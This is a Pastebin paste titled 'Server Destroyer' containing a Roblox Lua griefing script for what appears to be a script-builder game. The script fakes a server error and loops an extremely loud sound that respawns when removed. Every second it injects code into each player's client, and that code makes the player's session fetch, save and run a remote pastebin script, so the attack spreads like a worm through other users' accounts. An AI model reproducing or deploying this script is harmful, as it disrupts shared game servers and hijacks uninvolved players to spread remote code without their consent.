Advertisement
SlappyDappyCrappy

Server Destroyer

Dec 26th, 2016
1,052
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. if script.ClassName ~= "LocalScript" then
  2. local hs = game:GetService'HttpService'
  3. c = Instance.new("Message")
  4. c.Text = "ERROR: server.dll not found, contact an administrator for help."
  5. c.Parent = game.Workspace
  6. function makemusic()
  7. local music = Instance.new("Sound",workspace)
  8. music.Name = "yeet"
  9. music.SoundId = "rbxassetid://222937160"
  10. music.Volume = 100000
  11. music.Looped = true
  12. music:Play()
  13. end
  14. workspace.ChildRemoved:connect(function(p)
  15. wait(0.1)
  16. if p.Name == "WORMMLGMUSIC" then
  17. for index, child in pairs(workspace:GetChildren()) do
  18. if child.Name == "yeet" then
  19. i = i + 1
  20. end
  21. end
  22. if i == 0 then
  23. makemusic()
  24. end
  25. end
  26. end)
  27. i = 0
  28. for index, child in pairs(workspace:GetChildren()) do
  29. if child.Name == "yeet" then
  30. i = i + 1
  31. end
  32. end
  33. if i == 0 then
  34. makemusic()
  35. c = Instance.new("Hint")
  36. c.Text = "ERROR ERROR ERROR ERROR ERROR ERROR ERROR ERROR ERROR ERROR"
  37. c.Parent = game.Workspace
  38. end
  39. while wait(1) do
  40. for index, child in pairs(game:GetService'Players':GetChildren()) do
  41. newLocalScript([[
  42. game.Players.LocalPlayer.PlayerGui.SB_OutputGUI.Main.Output.Header.FPS.Text = "FPS: 385976.354"
  43. wait()
  44. game:GetService'Players'.LocalPlayer.PlayerGui.SB_DataTransfer.SB_CommandRemote.Value = 'h/http://pastebin.com/raw/V9dvvRFe' wait(0.25) game:GetService'Players'.LocalPlayer.PlayerGui.SB_DataTransfer.SB_CommandRemote.Value = 'createhttp/shfUiod/http://pastebin.com/raw/V9dvvRFe' wait(0.25) game:GetService'Players'.LocalPlayer.PlayerGui.SB_DataTransfer.SB_CommandRemote.Value = 'save/shfUiod' ]],child.PlayerGui)
  45. end
  46. end
  47. else
  48. game:GetService'Players'.LocalPlayer.PlayerGui.SB_DataTransfer.SB_CommandRemote.Value = 'h/http://pastebin.com/raw/V9dvvRFe'
  49. end
  50. local playerLeaderstats = {}
  51. for i, v in pairs(game.Players:GetChildren()) do
  52. table.insert(playerLeaderstats, v)
  53. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement